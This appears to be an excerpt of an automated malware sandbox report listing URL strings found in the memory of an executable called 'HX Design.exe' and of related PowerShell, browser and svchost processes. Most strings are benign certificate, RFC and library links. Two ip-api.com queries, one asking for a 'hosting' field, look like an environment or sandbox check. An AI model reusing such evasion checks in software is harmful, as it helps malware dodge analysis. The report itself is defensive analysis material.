Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: HX Design.exe, 00000001.00000003.2087756770.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099257602.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: HX Design.exe, 00000001.00000003.1706357551.00000294B4C69000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: HX Design.exe, 00000001.00000003.1706757467.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099002748.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: powershell.exe, 00000008.00000002.1815598451.00000197A9B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183E0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.esi
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: HX Design.exe, 00000001.00000003.2092472989.00000294B53EA000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B53EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/R
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000008.00000002.1793887408.0000019799CDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.1793887408.0000019799AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D1824A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1793887408.0000019799CDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096001614.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
Source: HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102914247.00000294B5C5C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5234
Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: HX Design.exe, 00000001.00000002.2102914247.00000294B5BA4000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102914247.00000294B5C5C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: chrome.exe, 0000003A.00000002.1927910627.00002F040022C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928665494.000076D800234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 0000003A.00000002.1927910627.00002F040022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/(
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlug
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B541E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B541E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: HX Design.exe, 00000001.00000002.2099002748.00000294B4694000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096462024.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B47A9000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2097242552.00000294B47A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183C0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: msedge.exe, 0000003B.00000002.1925230365.000076D800058000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: HX Design.exe, 00000001.00000002.2099002748.00000294B4650000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cpsr
Source: HX Design.exe, 00000001.00000003.2096462024.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099380626.00000294B4748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: powershell.exe, 00000008.00000002.1793887408.0000019799AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D1824A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161/
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162#
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
